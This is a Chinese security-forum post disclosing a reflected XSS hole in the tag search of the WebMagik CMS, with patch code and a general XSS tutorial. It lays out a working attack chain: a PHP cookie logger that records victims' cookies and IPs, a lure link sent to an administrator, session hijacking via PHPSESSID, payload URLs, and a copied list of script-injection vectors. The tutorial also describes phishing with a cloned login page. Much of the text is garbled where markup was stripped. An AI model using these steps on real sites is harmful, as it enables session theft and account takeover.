xss漏洞发现及利用

漏洞描述:在使用标签(tag)进行浏览时,由于没有很好的过滤用户输入(tag关键字)造成xss跨站漏洞,用户自定义的版块tag搜索和全局tag搜索列表。

利用形式1:
http://myhack58.com/web2/?u=Club_talk_list&tag=
其中http://myhack58.com/web2/为网站连接,Club_talk_list为用户自定义版块。
 
利用形式2:
http://myhack58.com/web2/?a=list&tag=
其中http://myhack58.com/web2/为网站连接,这个就是所谓的全局tag搜索。
 
漏洞危害:欺骗用户点击假冒连接盗取访问者的cookies甚至可能危害到访问者电脑安全,涉及帐户的相关信息可能被盗取。
 
漏洞发现者:clin003
已向官方报告漏洞情况。请wm使用者关注官方修补办法。
官方修补办法地址: http://webmagik.cn/bbs/viewthread.php?tid=638&pid=2225 
CODE: 
1 下载 module_list.php (2.83 KB)
并上传覆盖 /meta/module/module_list.php 后台重新生成各模块代码即可。
2 不想重新手工生成代码的,可以直接修改对应的 /umod/XXX_list.php 在页面最上方添加 $_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
 
Added By Easy 
——————————————————————
临时解决办法:
在所有涉及到tag搜索的页面 添加一行代码.
[Copy to clipboard] [ - ]
CODE:
$_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
 
官方在下一个版本会把过滤加进去。顺便说下,在模块基本设定中,如果开启不过滤数据,用户添加的内容也可以存在此问题。
 
----------------------------------
补充下:
在list.php(/mod/list.php)第二十四行的位置回车加上
$_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
这个是全局搜索tag的地方更新模块的时候不会被更新。
——————————————————————
 
 
漏洞发现过程:
在寻找使用过的中文标签为什么会失效的答案。添加一篇文章,然后由于想把“中间带空格的标签”合起来而使用啦单引号比如:‘webmagik  跨站’,提交的时候就出现问题。一堆数据库错误信息!!
怀疑有注入漏洞,,经多次检测没有注入漏洞。
忽然想到检测下跨站的这个xss代码(上次已经检测过搜索框的iframe跨站漏洞,只是没公布)。
 
--------------------------------------------------
下边是介绍xss漏洞的常识
----------------------------------------------------
什么是跨站脚本(CSS/XSS)?
  在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。
我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为"XSS",这是因为"CSS"一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。
 
XSS和脚本注射的区别?
 
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的
漏洞都被称为XSS,还有另一种攻击方式:"Script Injection",他们的区别在以下两点:
1.(Script Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
 
什么类型的脚本可以被插入远程页面?
主流脚本包括以下几种:
 HTML
 JavaScript (本文讨论)
 VBScript
 ActiveX
 Flash
 
测试代码:
1,在自己服务器上建立如下文件:
Getcookie.php
 
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('victim.htm', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$time. '
Referer: '.$referer.'


');
fclose($fp);
?>
 
Xss.js
document.write('');
 
2,发送信息给管理员
内容包含下边的连接:
http://myhack58.com/web2/?a=list&tag=_____________一个恶意的开始!!!
 
 
改进后的代码:
http://myhack58.com/web2/?a=list&tag=
成功收到cookies
3,等待管理员点击然后检查获得victim.htm内容。
4,复制从PHPSESSID= 到;的内容
 
 
启发来源:WEB漏洞挖掘技术
参考漏洞分析格式:PhpNuke管理员密码可泄露问题
----------------------------------------------------------------------
 
 
相关链接:
XSS:http://wiki.matrix.org.cn/Wiki.jsp?page=XSS
跨站脚本攻击(XSS)FAQ:http://tech.idv2.com/2006/08/30/xss-faq/
也谈跨站脚本攻击与防御:http://www.xfocus.net/articles/200607/874.html
浅析XSS(Cross Site Script)漏洞原:http://www.xker.com/page/e2007/0704/27444_3.html
PHP-Nuke个人消息存在HTML插入漏洞:http://www.xfocus.net/vuls/200208/2970.html
 
--------------------------------------------------------------------
 
 
预防的办法:-----------------------------------------------
1.在你的WEB浏览器上禁用javascript脚本
2..开发者要仔细审核代码,对提交输入数据进行有效检查,如"<"和">"。
   
可以把"<",">"转换为<,>
注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,
这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括"="。
 
对我们浏览网页的网友来说不要访问包含
 
 
http://myhack58.com/web2/?a=list&tag=
 
 
 
http://myhack58.com/web2/?a=list&tag=
 
 
http://myhack58.com/web2/?a=list&tag=
 
 
http://myhack58.com/web2/?a=list&tag=
 
 
http://myhack58.com/web2/?a=list&tag=
 
upload/2011/3/201103300326291646.bmp+οnlοad=alert("1111")>
 
 
upload/2011/3/201103300326291646.bmp+οnlοad=alert("1111")>
 
http://myhack58.com/web2/?a=list&tag=_____________一个恶意的开始!!!
 
 
upload/2011/3/201103300326291646.bmp+οnlοad=alert('1111')>
 
 
upload/2011/3/201103300326291646.bmp+οnlοad=alert(1111)>
 
 
http://myhack58.com/web2/?a=list&tag=<"
 
 
http://myhack58.com/web2/?a=list&tag=<'
 
 
http://myhack58.com/web2/?a=list&tag=<
 
 
http://myhack58.com/web2/?a=list&tag=
 
 
http://myhack58.com/web2/?a=list&tag=
 
以上所有的连接都检测出漏洞
 
 
漏洞利用代码:
获得cookie
http://myhack58.com/web2/?a=list&tag=%3Cscript%3Ealert(document.cookie)%3C%2fscript%3E
 
 
==============================================
什么是跨站脚本(CSS/XSS)?
 
 
  在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。
我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为"XSS",这是因为"CSS"一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。
 
XSS和脚本注射的区别?
 
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的 漏洞都被称为XSS,还有另一种攻击方式:"Script Injection",他们的区别在以下两点:
1.(Script Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
 
什么类型的脚本可以被插入远程页面?
 
主流脚本包括以下几种:
 HTML
 JavaScript (本文讨论)
 VBScript
 ActiveX
 Flash
 
是什么原因导致一个站点存在XSS的安全漏洞?
 
许多cgi/php脚本执行时,如果它发现客户提交的请求页面并不存在或其他类型的错误时,
出错信息会被打印到一个html文件,并将该错误页面发送给访问者。
例如: 404 - yourfile.html Not Found! 
 
我们一般对这样的信息不会注意,但是现在要研究CSS漏洞的成因,我们还是仔细看一下。
例:www.somesite.tld/cgi-bin/program.cgi?page=downloads.html该URL指向的连接是有效的,但是如果我们把后面的downloads.html替换成brainrawt_owns_me.html,一个包含404 - brainrawt_owns_me.html Not Found! 信息的页面将反馈给访问者的浏览器。
 
 
考虑一下它是如何把我们的输入写到html文件里的?
 
OK,现在是我们检查XSS漏洞的时候了!
 
注意:下面仅仅是一个例子,该页面存在XSS漏洞,我们可以插入一写javascript代码到页面里。当然方法很多www.somesite.tld/cgi-bin/program.cgi?page=
当我们提交这个URL的时候,在我们的浏览器中弹出一个消息框,"XSS_Vuln_Testing"? 
这个例子只是一个XSS漏洞的简单演示,并无实际意义,但足以说明问题所在。
 
下面我们分析一下造成该运行结果的原因,program.cgi对我们的输入没有经过有效过滤处理,就直接写入404 error页面中,结果创建了一个页面,如下:
          
 
          404 - Not Found!
 
          
 
其中的javascript脚本通过浏览器解释执行,然后就出现了你所看到的结果。
 
 
 
如何利用XSS来完成hacking?
 
如同前面所提到,如果用户提交的请求不能得到满足,那么服务器端脚本会把输入信息写入一个html文件,当服务器端程序对写入html文件的数据没有进行有效过滤,恶意脚本就可以插入到该html文件里。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。
 
事例:
 
假设你发现myemailserver.tld有CSS漏洞,你想要获得其中一个人的email帐号,比如我们的目标是b00b这个人。           www.myemailserver.tld/cgi-bin/news.cgi?article=59035
把上面存在CSS漏洞的连接修改一下:     www.myemailserver.tld/cgi-bin/news.cgi?article=hax0red
这会创建了一个错误页面,我们得到如下信息:           Invalid Input! [article=hax0red]
当插入下面这样的javascript代码时,你的屏幕上会弹出一个包含test的消息框。
           www.myemailserver.tld/cgi-bin/news.cgi?article=进行有效过滤,所以在页面发回到浏览器并执行了该脚本。
 
 
下面我们瞧瞧如何利用该漏洞入侵 b00b同志的邮箱,首先你必须知道b00b的email地址,
并且知道cookies的作用。那么你可以告诉b00b一个恶意的连接,嘿嘿,当然
它的用意就是从b00b机器中cookie信息里获得自己想要的东东。
想办法让b00b访问myemailserver.tld站点发表的文章,比如说:”亲爱的b00b,看看这个美
如何呀?”
 
那么当可怜的b00b访问 www.myemailserver.tld/cgi-bin/news.cgi?article=
连接时,发生什么事情?cookie都有了,你该知道怎么办了吧!
 
如果在你目前不是这样的情形,你可以拷贝email服务器的登陆页面,挂到其他的系统上,
然后引导用户登陆你的恶意系统页面
这样用户信息你可以记录下来,然后再把记录的信息发送回真正的email服务器页面,
那些笨蛋并不会意识到实际发生的事情。
 
把javascript脚本插入WEB页面的不同方法:
 
拷贝自:GOBBLES SECURITY ADVISORY #33
 Here is a cut-n-paste collection of typical JavaScript-injection hacks
 you may derive some glee from playing with.
 
  
  
  
   [IE]   [IE]
   [IE]
  &
  &{[code]}; [N4]
   [N4]